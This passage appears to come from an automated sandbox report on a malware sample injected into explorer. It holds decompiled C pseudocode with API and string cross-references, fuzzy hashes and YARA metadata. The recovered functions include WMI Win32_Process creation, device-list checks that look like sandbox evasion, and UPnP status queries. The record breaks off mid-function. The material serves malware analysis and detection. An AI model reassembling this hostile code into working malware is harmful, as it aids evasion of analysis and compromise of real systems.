							return 0;
						}
						_t122 = _a16;
						__eflags =  *((char*)(_t122 + 1)) - 1;
						if(__eflags != 0) {
							_push(7);
							_push(_t116);
							L50:
							_push(_a4);
							E01502752(__eflags);
							goto L51;
						}
						_t74 =  *((intOrPtr*)(_t122 + 3));
						_t117 = 0;
						__eflags =  *_t122 - 5;
						_v8 = 0;
						if( *_t122 != 5) {
							L2:
							return _t74 | 0xffffffff;
						}
						__eflags = _t74 - 1;
						if(_t74 != 1) {
							__eflags = _t74 - 3;
							if(_t74 != 3) {
								__eflags = _t74 - 4;
								if(__eflags != 0) {
									_t108 = _a8;
									L39:
									_push(2);
									_t124 = _a12 + 0x45;
									_push(0x152a36c);
									_push(_t124);
									L015077DC();
									_t132 = _t132 + 0xc;
									__eflags = _t74;
									if(_t74 == 0) {
										L44:
										_t77 = E015161E0( &_v8, _t108, _t117, 0,  &_v8);
										_t125 = _a8;
										_t132 = _t132 + 0x10;
										 *(_t125 + 0xa) = _t77;
										__eflags = _t77;
										if(__eflags >= 0) {
											__eflags = _v8 - 1;
											if(__eflags != 0) {
												E015026EC(__eflags, _a4, _t125);
											} else {
												 *((char*)(_t125 + 0x20)) = 1;
											}
											goto L51;
										}
										__imp__#111();
										_push(5);
										_push(_t125);
										goto L50;
									}
									__eflags = _t117 - 0x19;
									if(__eflags == 0) {
										L43:
										_push(2);
										L35:
										_push(_a8);
										goto L50;
									}
									__eflags = _t117 - 0x24b;
									if(_t117 != 0x24b) {
										goto L44;
									}
									__eflags = StrCmpNA(_t124, "pups", 4);
									if(__eflags == 0) {
										goto L44;
									}
									goto L43;
								}
								_push(8);
								goto L35;
							}
							_t118 =  *(_t122 + 4) & 0x000000ff;
							_t51 = _t122 + 5; // 0x1909e2d
							E01513AC0(__ecx,  &_v564, _t51, _t118);
							_t132 = _t132 + 0xc;
							_t84 =  &_v564;
							 *((char*)(_t130 + _t118 - 0x230)) = 0;
							__imp__#52(_t84);
							__eflags = _t84;
							if(__eflags == 0) {
								L34:
								_push(4);
								goto L35;
							}
							_t85 =  *(_t84 + 0xc);
							__eflags = _t85;
							if(__eflags == 0) {
								goto L34;
							}
							__eflags =  *_t85;
							if(__eflags == 0) {
								goto L34;
							}
							_t108 =  *( *_t85);
							_t74 =  *(_t118 + _t122 + 5) & 0x0000ffff;
							L33:
							__imp__#15(_t74);
							_t117 = _t74 & 0x0000ffff;
							goto L39;
						}
						_t108 =  *(_t122 + 4);
						_t74 =  *(_t122 + 8) & 0x0000ffff;
						goto L33;
					}
					_t119 = _a16;
					_t126 =  *(_t119 + 1) & 0x000000ff;
					__eflags = _a20 - _t126 + 4;
					if(_a20 >= _t126 + 4) {
						_t20 = _t119 + 2; // 0x1909e2a
						E01513AC0(__ecx,  &_v820, _t20, _t126);
						_t91 = _t126 + _t119;
						 *((char*)(_t130 + _t126 - 0x330)) = 0;
						_t109 =  *(_t126 + _t119 + 2) & 0x000000ff;
						_t113 = _t109 + _t126 + 3;
						_t134 = _t132 + 0xc;
						__eflags = _a20 - _t109 + _t126 + 3;
						if(_a20 >= _t109 + _t126 + 3) {
							E01513AC0(_t113,  &_v564, _t91 + 3, _t109);
							_t120 = _a12;
							_v308 =  *_t119;
							_t132 = _t134 + 0xc;
							_t32 = _t120 + 0x45; // 0x45
							 *((char*)(_t130 + _t109 - 0x230)) = 0;
							_t98 = lstrcmpA( &_v820, _t32);
							__eflags = _t98;
							if(_t98 != 0) {
								L21:
								_v307 = 1;
								L22:
								_push(2);
								_push( &_v308);
								_push( *((intOrPtr*)(_a8 + 6)));
								L10:
								_push(3);
								_push(_a4);
								E0150107B();
								goto L51;
							}
							_t103 = lstrcmpA( &_v564, _t120 + 0x145);
							__eflags = _t103;
							if(_t103 != 0) {
								goto L21;
							}
							_v307 = _t103;
							 *((char*)(_a8 + 0x2a)) = 2;
							goto L22;
						}
						_push(0xfffffffd);
						L15:
						_pop(_t105);
						return _t105;
					}
					_push(0xfffffffe);
					goto L15;
				}
				_t74 = _a16;
				if( *_t74 == 5) {
					_t115 =  *(_t74 + 1) & 0x000000ff;
					_t114 = 0;
					__eflags = _t115;
					if(_t115 <= 0) {
						L8:
						_v307 = 0xff;
						L9:
						_push(2);
						_push( &_v308);
						_push( *((intOrPtr*)(_t116 + 6)));
						goto L10;
					}
					_t129 = _a20 + 0xfffffffe;
					__eflags = _t129;
					while(1) {
						__eflags = _t114 - _t129;
						if(_t114 >= _t129) {
							goto L8;
						}
						__eflags =  *((char*)(_t114 + _t74 + 2)) - 2;
						if( *((char*)(_t114 + _t74 + 2)) == 2) {
							_v307 = 2;
							 *((char*)(_t116 + 0x2a)) = 1;
							goto L9;
						}
						_t114 = _t114 + 1;
						__eflags = _t114 - _t115;
						if(_t114 < _t115) {
							continue;
						}
						goto L8;
					}
					goto L8;
				}
				goto L2;
			}

0x015027ad
0x015027b2
0x015027b5
0x015027b8
0x015027bb
0x015027c4
0x01502828
0x0150282a
0x015028f2
0x015028f4
0x01502a1a
0x01502a1a
0x00000000
0x01502a1a
0x015028fa
0x015028fd
0x01502901
0x01502a0c
0x01502a0e
0x01502a0f
0x01502a0f
0x01502a12
0x00000000
0x01502a17
0x01502907
0x0150290a
0x0150290c
0x0150290f
0x01502912
0x015027ce
0x00000000
0x015027ce
0x01502918
0x0150291a
0x01502925
0x01502927
0x01502983
0x01502985
0x0150298b
0x0150298e
0x01502991
0x01502993
0x01502996
0x0150299b
0x0150299c
0x015029a1
0x015029a4
0x015029a6
0x015029ce
0x015029d6
0x015029db
0x015029de
0x015029e1
0x015029e4
0x015029e6
0x015029f3
0x015029f7
0x01502a03
0x015029f9
0x015029f9
0x015029f9
0x00000000
0x015029f7
0x015029e8
0x015029ee
0x015029f0
0x00000000
0x015029f0
0x015029a8
0x015029ac
0x015029ca
0x015029ca
0x0150297b
0x0150297b
0x00000000
0x0150297b
0x015029b3
0x015029b6
0x00000000
0x00000000
0x015029c6
0x015029c8
0x00000000
0x00000000
0x00000000
0x015029c8
0x01502987
0x00000000
0x01502987
0x01502929
0x0150292e
0x01502939
0x0150293e
0x01502941
0x01502948
0x0150294f
0x01502955
0x01502957
0x01502979
0x01502979
0x00000000
0x01502979
0x01502959
0x0150295c
0x0150295e
0x00000000
0x00000000
0x01502960
0x01502962
0x00000000
0x00000000
0x01502966
0x01502968
0x0150296d
0x0150296e
0x01502974
0x00000000
0x01502974
0x0150291c
0x0150291f
0x00000000
0x0150291f
0x01502830
0x01502833
0x0150283a
0x0150283d
0x01502848
0x01502853
0x01502858
0x0150285b
0x01502862
0x01502866
0x0150286a
0x0150286d
0x01502870
0x01502882
0x01502889
0x01502892
0x01502898
0x0150289b
0x015028a6
0x015028ae
0x015028b0
0x015028b2
0x015028d7
0x015028d7
0x015028de
0x015028de
0x015028e6
0x015028ea
0x01502809
0x01502809
0x0150280b
0x0150280e
0x00000000
0x01502813
0x015028c2
0x015028c4
0x015028c6
0x00000000
0x00000000
0x015028c8
0x015028d1
0x00000000
0x015028d1
0x01502872
0x01502841
0x01502841
0x00000000
0x01502841
0x0150283f
0x00000000
0x0150283f
0x015027c6
0x015027cc
0x015027d6
0x015027da
0x015027dc
0x015027de
0x015027f6
0x015027f6
0x015027fd
0x015027fd
0x01502805
0x01502806
0x00000000
0x01502806
0x015027e3
0x015027e3
0x015027e6
0x015027e6
0x015027e8
0x00000000
0x00000000
0x015027ea
0x015027ef
0x0150281b
0x01502822
0x00000000
0x01502822
0x015027f1
0x015027f2
0x015027f4
0x00000000
0x00000000
0x00000000
0x015027f4
0x00000000
0x015027e6
0x00000000

Strings

pups, xrefs: 015029BA

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID: pups
API String ID: 0-4268919883
Opcode ID: 514e21c5bf84295a7b5faa183dd22abd2ac019f337d8cc47c2d649fd14fd2656
Instruction ID: 7b8f714b34164709c20f3455830be144e494e843640a26a4e7dd044a03de91d5
Opcode Fuzzy Hash: 514e21c5bf84295a7b5faa183dd22abd2ac019f337d8cc47c2d649fd14fd2656
Instruction Fuzzy Hash: A081EB3190425AAFDB338F988C4CBAA7BA9BF15310F0845A5F9559F1C2D370D685CB61

Uniqueness

Uniqueness Score: 100.00%

Function 00400920, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 188comCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 00400945
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040096C
CoCreateInstance.OLE32(0040C4D8,00000000,00000001,0040C408,00000000), ref: 00400993
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00400A04

Strings

ROOT\CIMV2, xrefs: 004009C4
Create, xrefs: 00400A7E, 00400AFE
Win32_Process, xrefs: 00400A4B, 00400B03
CommandLine, xrefs: 00400ADA

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Initialize$BlanketCreateInstanceProxySecurity
String ID: CommandLine$Create$ROOT\CIMV2$Win32_Process
API String ID: 1719769963-1237754972
Opcode ID: 01c0263fa286b7f6f5cc30b7b789f54b323126cbccb5fd25e4ebf175667c1380
Instruction ID: 1ad901ee0b7201ec58680b3181a755ae8e4a17231ddd2788deb3fcee80415754
Opcode Fuzzy Hash: 01c0263fa286b7f6f5cc30b7b789f54b323126cbccb5fd25e4ebf175667c1380
Instruction Fuzzy Hash: EF611B74A40309EFEB10DB95CC45FAEB7B0BB58714F20826AE111BB2D0D7B86A41CF59

Uniqueness

Uniqueness Score: 2.20%

Function 003FA920, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 177
UNIQUE

Download Yara Rule

C-Code - Quality: 40%

			E003FA920() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v68;
				signed int _v72;
				char** _v76;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				signed int _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _t82;
				char* _t85;
				char* _t87;
				char* _t91;
				char* _t98;
				void* _t126;
				void* _t127;
				void* _t128;

				_v80 = 0;
				_v140 = 0x5c;
				_v136 = 0x16f0;
				_v132 = 0x1b5d;
				_v128 = 0x1849;
				_v124 = 0x1c7b;
				_v120 = 0x2868;
				_v116 = 0x1e91;
				_v112 = 0x1638;
				_v108 = 0x9a;
				_v104 = 0x22c1;
				_v100 = 0xab3;
				_v96 = 0x217;
				_v92 = 0x221d;
				_v88 = 0x9f;
				_v84 = 0x8f5;
				_v40 = 0x1cc2;
				_v36 = 0x222a;
				_v32 = 0x309;
				_v28 = 0x90a;
				_v24 = 0x1d72;
				_v20 = 0x58b;
				_v16 = 0x7d2;
				_v12 = 0x1994;
				_v8 = 0x2bcf;
				while(0 != 0) {
				}
				__imp__SetupDiGetClassDevsA(0, 0, 0, 6);
				_v76 = 0;
				if(_v76 != 0xffffffff) {
					_v68 = 0x1c;
					_v72 = 0;
					while(1) {
						_t82 =  &_v68;
						__imp__SetupDiEnumDeviceInfo(_v76, _v72, _t82);
						if(_t82 == 0) {
							break;
						}
						_v148 = 0;
						_v152 = 0;
						_t107 = _v76;
						_t85 = E003FAC10(_v76,  &_v68, 0);
						_t128 = _t127 + 0xc;
						_v148 = _t85;
						if(_v148 == 0) {
							L22:
							_t87 = E003FAC10(_v76,  &_v68, 4);
							_t127 = _t128 + 0xc;
							_v152 = _t87;
							if(_v152 == 0) {
								L34:
								if(_v80 <= 0) {
									if(_v80 <= 0) {
										_v72 = _v72 + 1;
										continue;
									}
									break;
								}
								break;
							}
							_v144 = 0;
							while(_v144 < 9) {
								_t91 = E003F8060(_t107,  *((intOrPtr*)(_t126 + _v144 * 4 - 0x24)));
								_t127 = _t127 + 4;
								_v160 = _t91;
								if(_v160 == 0) {
									L32:
									_t107 = _v144 + 1;
									_v144 = _v144 + 1;
									continue;
								}
								if(StrStrIA(_v152, _v160) == 0) {
									E003F8170( &_v160);
									_t127 = _t127 + 4;
									goto L32;
								}
								while(0 != 0) {
								}
								_v80 = 1;
								E003F8170( &_v160);
								_t127 = _t127 + 4;
								break;
							}
							E003F3F10( &_v152, 0);
							_t127 = _t127 + 8;
							goto L34;
						}
						_v144 = 0;
						while(_v144 < 0xf) {
							_t98 = E003F8060( *((intOrPtr*)(_t126 + _v144 * 4 - 0x88)),  *((intOrPtr*)(_t126 + _v144 * 4 - 0x88)));
							_t128 = _t128 + 4;
							_v156 = _t98;
							if(_v156 == 0) {
								L20:
								_v144 = _v144 + 1;
								continue;
							}
							if(StrStrIA(_v148, _v156) == 0) {
								E003F8170( &_v156);
								_t128 = _t128 + 4;
								goto L20;
							}
							while(0 != 0) {
							}
							_v80 = 1;
							E003F8170( &_v156);
							_t128 = _t128 + 4;
							break;
						}
						_t107 =  &_v148;
						E003F3F10( &_v148, 0);
						_t128 = _t128 + 8;
						goto L22;
					}
					__imp__SetupDiDestroyDeviceInfoList(_v76);
					while(0 != 0) {
					}
					return _v80;
				}
				while(0 != 0) {
				}
				return 0xffffffff;
			}

0x003fa929
0x003fa930
0x003fa93a
0x003fa944
0x003fa94b
0x003fa952
0x003fa959
0x003fa960
0x003fa967
0x003fa96e
0x003fa975
0x003fa97c
0x003fa983
0x003fa98a
0x003fa991
0x003fa998
0x003fa99f
0x003fa9a6
0x003fa9ad
0x003fa9b4
0x003fa9bb
0x003fa9c2
0x003fa9c9
0x003fa9d0
0x003fa9d7
0x003fa9de
0x003fa9e2
0x003fa9ec
0x003fa9f2
0x003fa9f9
0x003faa09
0x003faa10
0x003faa22
0x003faa22
0x003faa2e
0x003faa36
0x00000000
0x00000000
0x003faa3c
0x003faa46
0x003faa56
0x003faa5a
0x003faa5f
0x003faa62
0x003faa6f
0x003fab19
0x003fab23
0x003fab28
0x003fab2b
0x003fab38
0x003fabdf
0x003fabe3
0x003fabeb
0x003faa1f
0x00000000
0x003faa1f
0x00000000
0x003fabed
0x00000000
0x003fabe5
0x003fab3e
0x003fab59
0x003fab6d
0x003fab72
0x003fab75
0x003fab82
0x003fabc9
0x003fab50
0x003fab53
0x00000000
0x003fab53
0x003fab9a
0x003fabc1
0x003fabc6
0x00000000
0x003fabc6
0x003fab9c
0x003faba0
0x003faba2
0x003fabb0
0x003fabb5
0x00000000
0x003fabb5
0x003fabd7
0x003fabdc
0x00000000
0x003fabdc
0x003faa75
0x003faa90
0x003faaa7
0x003faaac
0x003faaaf
0x003faabc
0x003fab03
0x003faa8a
0x00000000
0x003faa8a
0x003faad4
0x003faafb
0x003fab00
0x00000000
0x003fab00
0x003faad6
0x003faada
0x003faadc
0x003faaea
0x003faaef
0x00000000
0x003faaef
0x003fab0a
0x003fab11
0x003fab16
0x00000000
0x003fab16
0x003fabf8
0x003fabfe
0x003fac02
0x00000000
0x003fac04
0x003fa9fb
0x003fa9ff
0x00000000

APIs

SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 003FA9EC
SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 003FAA2E
SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 003FABF8

Part of subcall function 003FAC10: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003FAC47
Part of subcall function 003FAC10: GetLastError.KERNEL32 ref: 003FAC51

StrStrIA.SHLWAPI(00000000,00000000), ref: 003FAACC
StrStrIA.SHLWAPI(00000000,00000000), ref: 003FAB92

Strings

*", xrefs: 003FA9A6
h(, xrefs: 003FA959
\, xrefs: 003FA930

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: Setup$Device$Info$ClassDestroyDevsEnumErrorLastListPropertyRegistry
String ID: *"$\$h(
API String ID: 751695858-2928313126
Opcode ID: d4829ce4111fe24168fb781b187b2c6d1cd6fc3dfaa6f741a042d04faee1368d
Instruction ID: c8fe310a0088f41879aa5033ba96c22c95cacd64339ca6e0795ffaadb9c13f8b
Opcode Fuzzy Hash: d4829ce4111fe24168fb781b187b2c6d1cd6fc3dfaa6f741a042d04faee1368d
Instruction Fuzzy Hash: 2C713EB0D0061CDBEF21CFA0D949BEDB7B5BB04308F148599D20DAB281DB795A89DF52

Uniqueness

Uniqueness Score: 100.00%

Function 0150C190, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 128
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0150C190(intOrPtr _a4, intOrPtr _a8, char* _a12, long* _a16, char* _a20) {
				char* _v8;
				char* _v12;
				char _v16;
				char _v108;
				char _v112;
				char* _v116;
				char _v120;
				char _t50;
				char* _t58;
				char* _t60;
				intOrPtr _t63;
				long _t66;
				void* _t82;
				void* _t83;
				void* _t88;
				void* _t89;

				_v112 = 0xffffffff;
				if(_a12 == 0 && _a16 == 0) {
					return 0xfffffffe;
				}
				_t50 = E0150AEF0(_a8, 0xffffffff, _a4, _a8, "GetStatusInfo", 0,  &_v16);
				_t83 = _t82 + 0x18;
				_v120 = _t50;
				__eflags = _v120;
				if(_v120 == 0) {
					return 0xfffffffd;
				}
				E0150E6C0(_v120, _v16,  &_v108);
				E01513990( &_v120, 0);
				_t73 =  &_v108;
				_v12 = E0150E9B0( &_v108, "NewUptime");
				_v8 = E0150E9B0( &_v108, "NewConnectionStatus");
				_t58 = E0150E9B0( &_v108, "NewLastConnectionError");
				_t88 = _t83 + 0x2c;
				_v116 = _t58;
				__eflags = _v8;
				if(_v8 != 0) {
					__eflags = _v12;
					if(_v12 != 0) {
						_v112 = 0;
					}
				}
				__eflags = _a12;
				if(_a12 != 0) {
					__eflags = _v8;
					if(_v8 == 0) {
						_t73 = _a12;
						 *_a12 = 0;
					} else {
						_t73 = _v8;
						strncpy(_a12, _v8, 0x40);
						_t88 = _t88 + 0xc;
						_a12[0x3f] = 0;
					}
				}
				__eflags = _a16;
				if(_a16 != 0) {
					__eflags = _v12;
					if(_v12 == 0) {
						_a16 = 0;
					} else {
						_t66 = atol(_v12);
						_t88 = _t88 + 4;
						_t73 = _a16;
						 *_a16 = _t66;
					}
				}
				__eflags = _a20;
				if(_a20 != 0) {
					__eflags = _v116;
					if(_v116 == 0) {
						 *_a20 = 0;
					} else {
						strncpy(_a20, _v116, 0x40);
						_t88 = _t88 + 0xc;
						_t73 = _a20;
						_a20[0x3f] = 0;
					}
				}
				_t60 = E0150E9B0( &_v108, "errorCode");
				_t89 = _t88 + 8;
				_v8 = _t60;
				__eflags = _v8;
				if(__eflags != 0) {
					_v112 = 0xffffffff;
					_t73 = _v8;
					_t63 = E01513E60(__eflags, _v8);
					_t89 = _t89 + 4;
					_v112 = _t63;
				}
				E0150E930(_t73,  &_v108);
				return _v112;
			}

0x0150c196
0x0150c1a1
0x00000000
0x0150c1a9
0x0150c1c8
0x0150c1cd
0x0150c1d0
0x0150c1d3
0x0150c1d7
0x00000000
0x0150c1d9
0x0150c1ef
0x0150c1fd
0x0150c20a
0x0150c216
0x0150c22a
0x0150c236
0x0150c23b
0x0150c23e
0x0150c241
0x0150c245
0x0150c247
0x0150c24b
0x0150c24d
0x0150c24d
0x0150c24b
0x0150c254
0x0150c258
0x0150c25a
0x0150c25e
0x0150c27b
0x0150c27e
0x0150c260
0x0150c262
0x0150c26a
0x0150c26f
0x0150c275
0x0150c275
0x0150c25e
0x0150c281
0x0150c285
0x0150c287
0x0150c28b
0x0150c2a0
0x0150c28d
0x0150c291
0x0150c296
0x0150c299
0x0150c29c
0x0150c29c
0x0150c28b
0x0150c2a7
0x0150c2ab
0x0150c2ad
0x0150c2b1
0x0150c2d1
0x0150c2b3
0x0150c2bd
0x0150c2c2
0x0150c2c5
0x0150c2c8
0x0150c2c8
0x0150c2b1
0x0150c2dd
0x0150c2e2
0x0150c2e5
0x0150c2e8
0x0150c2ec
0x0150c2ee
0x0150c2f5
0x0150c2f9
0x0150c2fe
0x0150c301
0x0150c301
0x0150c308
0x00000000

APIs

strncpy.MSVCRT(00000000,00000000,00000040), ref: 0150C26A
atol.MSVCRT(00000000), ref: 0150C291
strncpy.MSVCRT(00000000,00000000,00000040), ref: 0150C2BD

Strings

NewLastConnectionError, xrefs: 0150C22D
NewUptime, xrefs: 0150C205
GetStatusInfo, xrefs: 0150C1B9
NewConnectionStatus, xrefs: 0150C219
errorCode, xrefs: 0150C2D4

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: strncpy$atol
String ID: GetStatusInfo$NewConnectionStatus$NewLastConnectionError$NewUptime$errorCode
API String ID: 3699643334-163513606
Opcode ID: 7933cede7f02240dcb5bb33c2ef72221efac81326146d6b5251708133e97b15f
Instruction ID: 4ccebb92fd0fc5e69eba69ba7b2920ae9ab7bfea78a2b601f2d52d9ad78d097c
Opcode Fuzzy Hash: 7933cede7f02240dcb5bb33c2ef72221efac81326146d6b5251708133e97b15f
Instruction Fuzzy Hash: 44417CB1C0020AEBDB12DFE8DC45BDE7BB4BB95304F204A68E9186F2C1E7749654CB91

Uniqueness

Uniqueness Score: 10.55%

Function 01524B00, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E01524B00(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t16;
				int _t19;
				char* _t20;
				char* _t25;
				char* _t27;
				intOrPtr _t35;
				char* _t37;
				void* _t39;
				signed int _t42;
				void* _t45;
				void* _t47;
				long long* _t48;
				void* _t49;
				void* _t50;

				_t16 = _a20;
				if(_t16 == 0) {
					_t16 = 0x11;
				}
				_t27 = _a4;
				_t35 = _a8;
				_t48 = _t47 - 8;
				 *_t48 = _a12;
				_push(_t16);
				_push("%.*g");
				_push(_t35);
				_push(_t27);
				L015290C0();
				_t42 = _t16;
				_t49 = _t48 + 0x18;
				if(_t42 >= 0) {
					_a20 = _t42;
					if(_t42 >= _t35) {
						goto L3;
					} else {
						L015290EA();
						_t19 =  *((intOrPtr*)( *_t16));
						if(_t19 != 0x2e) {
							_t25 = strchr(_t27, _t19);
							_t49 = _t49 + 8;
							if(_t25 != 0) {
								 *_t25 = 0x2e;
							}
						}
						_t20 = strchr(_t27, 0x2e);
						_t50 = _t49 + 8;
						if(_t20 != 0) {
							L12:
							_t37 = strchr(_t27, 0x65);
							if(_t37 != 0) {
								_t39 = _t37 + 1;
								_t11 = _t39 + 1; // 0x2
								_t45 = _t11;
								if( *_t39 == 0x2d) {
									_t39 = _t45;
								}
								while( *_t45 == 0x30) {
									_t45 = _t45 + 1;
								}
								if(_t45 != _t39) {
									memmove(_t39, _t45, _a20 - _t45 + _t27);
									_a20 = _a20 + _t39 - _t45;
								}
							}
							return _a20;
						} else {
							_t16 = strchr(_t27, 0x65);
							_t50 = _t50 + 8;
							if(_t16 != 0) {
								goto L12;
							} else {
								_t6 = _t42 + 3; // 0x3
								if(_t6 >= _t35) {
									goto L3;
								} else {
									_t27[_t42] = 0x302e;
									( &(_t27[2]))[_t42] = _t16;
									_a20 = _t42 + 2;
									goto L12;
								}
							}
						}
					}
				} else {
					L3:
					return _t16 | 0xffffffff;
				}
			}

0x01524b03
0x01524b08
0x01524b0a
0x01524b0a
0x01524b13
0x01524b18
0x01524b1b
0x01524b1e
0x01524b21
0x01524b22
0x01524b27
0x01524b28
0x01524b29
0x01524b2e
0x01524b30
0x01524b35
0x01524b3f
0x01524b44
0x00000000
0x01524b46
0x01524b46
0x01524b4d
0x01524b51
0x01524b58
0x01524b5d
0x01524b62
0x01524b64
0x01524b64
0x01524b62
0x01524b6a
0x01524b6f
0x01524b74
0x01524b9c
0x01524ba4
0x01524bab
0x01524bad
0x01524bb1
0x01524bb1
0x01524bb4
0x01524bb6
0x01524bb6
0x01524bbb
0x01524bc0
0x01524bc1
0x01524bc8
0x01524bd4
0x01524bde
0x01524bde
0x01524bc8
0x01524be8
0x01524b76
0x01524b79
0x01524b7e
0x01524b83
0x00000000
0x01524b85
0x01524b85
0x01524b8a
0x00000000
0x01524b8c
0x01524b8c
0x01524b92
0x01524b99
0x00000000
0x01524b99
0x01524b8a
0x01524b83
0x01524b74
0x01524b37
0x01524b37
0x01524b3e
0x01524b3e

APIs

_snprintf.MSVCRT(?,01523582,%.*g,?,?,00000064), ref: 01524B29
localeconv.MSVCRT ref: 01524B46
strchr.MSVCRT(?,?), ref: 01524B58
strchr.MSVCRT(?,0000002E), ref: 01524B6A
strchr.MSVCRT(?,00000065), ref: 01524B79
strchr.MSVCRT(?,00000065), ref: 01524B9F
memmove.MSVCRT(00000001,00000002,?), ref: 01524BD4

Strings

%.*g, xrefs: 01524B22

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: strchr$_snprintflocaleconvmemmove
String ID: %.*g
API String ID: 3793506855-952554281
Opcode ID: 65674a878a276282cd9e802db65e167a044b708471c70c85bd1f3880b33ca733
Instruction ID: 69498e5cdf18be313aa4fcc57a71fa81ff305140e2f05cedcba2fafe2cfc15aa
Opcode Fuzzy Hash: 65674a878a276282cd9e802db65e167a044b708471c70c85bd1f3880b33ca733
Instruction Fuzzy Hash: F0214B735006665BDF239E6C8C81BAF7FA8BF96651F180118EC884F2C1E671E455C3E1

Uniqueness

Uniqueness Score: 8.94%

Function 003FEF00, Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 405
stringUNIQUE

Download Yara Rule

C-Code - Quality: 66%

			E003FEF00(void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, CHAR* _a20) {
				signed int _v8;
				intOrPtr _v20;
				intOrPtr _v28;
				WCHAR* _v32;
				signed int _v36;
				char _v72;
				signed int _v76;
				char _v92;
				signed int _v96;
				signed int _v100;
				char _v164;
				intOrPtr _v168;
				char _v236;
				signed int _v240;
				signed int _v244;
				char _v772;
				signed int _v776;
				signed int _v780;
				signed int _v784;
				signed int _v788;
				WCHAR* _v792;
				signed int _v796;
				short _v1316;
				char _v1324;
				signed int _t118;
				signed int _t132;
				signed int _t136;
				signed int _t137;
				intOrPtr _t138;
				signed int _t147;
				signed int _t155;
				signed int _t159;
				signed int _t161;
				signed int _t170;
				signed int _t175;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				signed int _t188;
				signed int _t217;
				signed int _t237;
				intOrPtr _t255;
				intOrPtr _t256;
				void* _t257;
				void* _t262;
				void* _t264;
				void* _t266;
				void* _t267;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t278;
				void* _t284;

				_t284 = __fp0;
				_push(0xffffffff);
				_push(0x40c5e8);
				_push(0x3f3ab6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t255;
				_t256 = _t255 + 0xfffffae4;
				_v28 = _t256;
				_v96 = 0xffffffff;
				_v100 = 0;
				_v36 = 0;
				_v32 = 0;
				_v76 = 0;
				_v8 = 0;
				_v240 = 0;
				_v244 = 0;
				do {
				} while (0 != 0);
				_t118 = E004001E0(_a4,  &_v772, 0x104);
				_t257 = _t256 + 0xc;
				__eflags = _t118;
				if(__eflags != 0) {
					_v168 = E003F98F0(_a8);
					E003F9590(__eflags, _t284, _v168,  &_v72, 0x20);
					E003FF4D0(__eflags,  &_v72,  &_v236,  &_v164);
					E003F9910( &_v92, _t284, E003FDD20( &_v72, lstrlenA( &_v72), 0),  &_v92);
					_t262 = _t257 + 0x30;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					E003F9410(0, 0);
					E003F8C60();
					E003F8C90();
					_t132 = E00400310(_t284, _a4,  &_v72,  *(_a12 + 0xc));
					_t264 = _t262 + 0x10;
					_v100 = _t132;
					__eflags = _v100;
					if(_v100 != 0) {
						_push(0);
						_push( &_v164);
						_push(0x4087f0);
						_v32 = E003F4CB0(_v100);
						_push(0);
						_push( &_v236);
						_push(0x4087f0);
						_t136 = E003F4CB0(_v100);
						_t266 = _t264 + 0x20;
						_v36 = _t136;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t137 = E003FEEC0(0,  &_v72);
						_t267 = _t266 + 4;
						_v240 = _t137;
						_t138 = _a12;
						_t209 =  *(_t138 + 0xc) & 0x00000001;
						__eflags =  *(_t138 + 0xc) & 0x00000001;
						if(( *(_t138 + 0xc) & 0x00000001) != 0) {
							L35:
							__eflags =  *0x40fb68 - 3;
							if( *0x40fb68 == 3) {
								_t217 =  *0x411408; // 0x0
